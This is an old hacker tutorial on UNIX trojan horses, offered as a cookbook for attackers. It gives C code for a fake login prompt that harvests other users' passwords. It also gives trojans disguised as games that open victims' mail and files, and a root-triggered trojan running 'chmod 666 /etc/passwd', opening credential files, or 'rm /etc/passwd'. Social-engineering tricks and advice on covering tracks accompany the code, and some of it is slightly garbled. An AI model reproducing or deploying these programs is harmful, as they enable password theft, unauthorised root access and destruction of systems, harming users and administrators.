------------------
                              UNIX Trojan Horses
                              ------------------

Introduction
------------

     "UNIX Security" is an oxymoron.  It's an easy system to bruteforce hack
(most UNIX systems don't hang up after x number of login tries, and there are
a number of default logins, such as root, bin, sys and uucp).  Once you're in
the system, you can easily bring it to its knees or, if you know a little 'C',
you can make the system work for you and totally eliminate the security
barriers to creating your own logins, reading anybody's files, etcetera.  This
file will outline such ways by presenting 'C' code that you can implement
yourself.

Requirements
------------
     You'll need a working account on a UNIX system.  It should be a fairly
robust version of UNIX (such as 4.2bsd or AT&T System V) running on a real
machine (a PDP/11, VAX, Pyramid, etc.) for the best results.  If you go to
school and have an account on the school system, that will do perfectly.

Notes
-----
     This file was inspired an article in the April, '86 issue of BYTE
entitled "Making UNIX Secure."  In the article, the authors say "We provide
this information in a way that, we hope, is interesting and useful yet stops
short of being a 'cookbook for crackers.'  We have often intentionally omitted
details."  I am following the general outline of the article, giving explicit
examples of the methods they touched on.


Project One:  Fishing For Passwords
-----------------------------------

     You can implement this with only a minimal knowledge of UNIX and C.
However, you need access to a terminal that many people use - the computer lab
at your school, for example.

     When you log onto a typical UNIX system, you see something like this:

Tiburon Systems 4.2bsd / System V (shark)


login: shark
Password:      (not printed)

     The program I'm giving you here simulates a logon sequence.  You run the
program from a terminal and then leave.  Some unknowing fool will walk up and
enter their login and password.  It is written to a file of yours, then "login
incorrect" is printed, then the fool is asked to log in again.  The second
time it's the real login program.  This time the person succeeds and they are
none the wiser.

     On the system, put the following code into a file called 'horse.c'.  You
will need to modify the first 8 lines to fit your system's appearance.


----- Code Begins Here -----

/* this is what a 'C' comment looks like.  You can leave them out. */

/* #define's are like macros you can use for configuration. */

#define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n"

/* The above string should be made to look like the message that your
 * system prints when ready.  Each \n represents a carriage return.
 */

#define LOGIN  "login: "

/* The above is the login prompt.  You shouldn't have to change it
 * unless you're running some strange version of UNIX.
 */

#define PASSWORD "password:"

/* The above is the password prompt.  You shouldn't have to change
 * it, either.
 */

#define WAIT 2

/* The numerical value assigned to WAIT is the delay you get after
 * "password:" and before "login incorrect."  Change it (0 = almost
 * no delay, 5 = LONG delay) so it looks like your system's delay.
 * realism is the key here - we don't want our target to become
 * suspicious.
 */


#define INCORRECT "Login incorrect.\n"

/* Change the above so it is what your system says when an incorrect
 * login is given.  You shouldn't have to change it.
 */

#define FILENAME "stuff"

/* FILENAME is the name of the file that the hacked passwords will
 * be put into automatically.  'stuff' is a perfectly good name.
 */

/* Don't change the rest of the program unless there is a need to
 * and you know 'C'.
 */

#include 
#include 
int stop();

main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
signal(SIGINT,stop);
initscr();
printf(SYSTEM);
printf(LOGIN);
scanf("%[^\n]",name);
getchar();
noecho();
printf(PASSWORD);
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(WAIT);


if ( ( fp = fopen(FILENAME,"a") )  != NULL ) {
#fprintf(fp,"login %s has password %s\n",name,password);
#fclose(fp);
#}

printf(INCORRECT);
endwin();
}

stop()
{
endwin();
exit(0);
}


----- Source Ends Here -----

     OK, as I said, enter the above and configure it so it looks exactly like
your system's login sequence.  To compile this program called 'horse.c' type
the following two lines: (don't type the %'s, they are just a sample prompt)

% cc horse.c -lcurses -ltermcap
% mv a.out horse

You now have the working object code in a file called 'horse'.  Run it, and if
it doesn't look like your systems logon sequence, re-edit horse.c and
recomplie it.  When you're ready to put the program into use, create a new
file and call it 'trap' or something.  'trap' should have these two commands:

horse                    (this runs your program)
login                    (this runs the real login program)

to execute 'trap' type:

% source trap            (again, don't type the %)

and walk away from your terminal...

After you've run it successfully a few times, check your file called
'stuff' (or whatever you decided to call it).  It will look like this:

user john has password secret
user mary has password smegma
etc.

Copy down these passwords, then delete this file (it can be VERY incriminating
if the superuser sees it).

Note - for best results your terminal should be set to time-out after a few
minutes of non-use - that way, your horse program doesn't run idle for 14
hours if nobody uses the terminal you ran it on.

-----

The next projects can be run on a remote system, such as the VAX in Michigan
you've hacked into, or Dartmouth's UNIX system, or whatever.  However, they
require a little knowledge of the 'C' language.  They're not something for
UNIX novices.

Project Two:  Reading Anybody's Files
-------------------------------------

When somebody runs a program, they're the owner of the process created and
that program can do anything they would do, such as delete a file in their
directory or making a file of theirs available for reading by anybody.

When people save old mail they get on a UNIX system, it's put into a file
called mbox in their home directory.  This file can be fun to read but is
usually impossible for anybody but the file's owner to read.  Here is a short
program that will unlock (i.e. chmod 777, or let anybody on the system read,
write or execute) the mbox file of the person who runs the program:

----- Code Begins Here -----

#include 

struct passwd *getpwnam(name);
struct passwd *p;
char buf[255];

main()
{
p = getpwnam(getlogin());
sprintf(buf,"%s/%s",p->pw_dir,"mbox");
if ( access(buf,0) > -1 ) {
        sprintf(buf,"chmod 777 %s/%s",p->pw_dir,"mbox");
        system(buf);
        }
}

----- Code Ends Here -----

So the question is:  How do I get my target to run this program that's
in my directory?

If the system you're on has a public-messages type of thing (on 4.xbsd, type
'msgs') you can advertise your program there.  Put the above code in another
program - find a utility or game program in some magazine like UNIX WORLD and
modify it and do the above before it does it's real thing.  So if you have a
program called tic-tac-toe and you've modified it to unlock the mbox file of
the user before it plays tic-tac-toe with him, advertise "I have a new tic-
tac-toe program running that you should all try.  It's in my directory." or
whatever.  If you don't have means of telling everybody on the system via a
public message, then just send mail to the specific people you want to trap.

If you can't find a real program to modify, just take the above program and
add this line between the two '}' lines at the end of the program:

printf("Error opening tic-tac-toe data file.  Sorry!\n");

when the program runs, it will print the above error message.  The user will
think "Heh, that dude doesn't know how to write a simple tic-tac-toe program!"
but the joke's on him - you can now read his mail.

If there's a specific file in a user's directory that you'd like to read (say
it's called "secret") just throw together this general program:


main()
{
if ( access("secret",0) > -1 ) system("chmod 777 secret");
}

then 'talk' or 'write' to him and act like Joe Loser: "I wrote this program
called super_star_wars, will you try it out?"

You can use your imagination.  Think of a command you'd like somebody to
execute.  Then put it inside a system() call in a C program and trick them
into running your program!

Here's a very neat way of using the above technique:

Project Three: Become the superuser
-----------------------------------

Write a program that you can get people to run.  Put this line in it
somewhere:

if ( !strcmp(getlogin(),"root") ) system("whatever you want");

This checks to see if the root login is running your program.  If he is, you
can have him execute any shell command you'd like.  Here are some suggestions:

"chmod 666 /etc/passwd"

     /etc/passwd is the system's password file.  The root owns this file.
Normally, everyone can read it (the passwords are encrypted) but only the root
can write to it.  Take a look at it and see how it's formatted if you don't
know already.  This command makes it possible for you to now write to the file
- i.e. create unlimited accounts for yourself and your friends.

"chmod 666 /etc/group"

     By adding yourself to some high-access groups, you can open many
doors.

"chmod 666 /usr/lib/uucp/L.sys"

     Look for this file on your system if it is on the uucp net.  It contains
dialups and passwords to other systems on the net, and normally only the uucp
administrator can read it.  Find out who owns this file and get him to
unknowingly execute a program to unlock it for you.

"rm /etc/passwd"

     If you can get the root to execute this command, the system's passwd file
will be removed and the system will go down and will not come up for some time
to come.  This is very destructive.

-----

If you are going to go about adding a trojan horse program to the system,
there are some rules you should follow.  If the hidden purpose is something
major (such as unlocking the user's mbox or deleting all of his files or
something) this program shouldn't be a program that people will be running a
lot (such as a popular computer game) - once people discover that their files
are public access the source of the problem will be discovered quite easily.
Save this purpose for a 'test' program (such as a game you're in the process
of writing) that you ask individual people to run via mail or 'chatting' with
them.  As I said, this 'test' program can bomb or print a phony error message
after completing its task, and you will just tell the person "well, I guess
it needs more work", wait until they log off, and then read whatever file of
theirs that you've unlocked.  If your trojan horse program's sole purpose is
to catch a specific user running it - such as the root or other high-powered
user - you can put the code to do so in a program that will be run a lot by
various users of the system.  Your modification will remain dormant until he
runs it.  If you can't find the source to 'star trek' or whatever in C, just
learn C and convert something from pascal.  It can't hurt to learn C as it's a
great language.  We've just seen what it can do on a UNIX system.  Once you've
caught the root (i.e. you can now modify the /etc/passwd file) remove the
spurious code from your trojan horse program and you'll never be caught.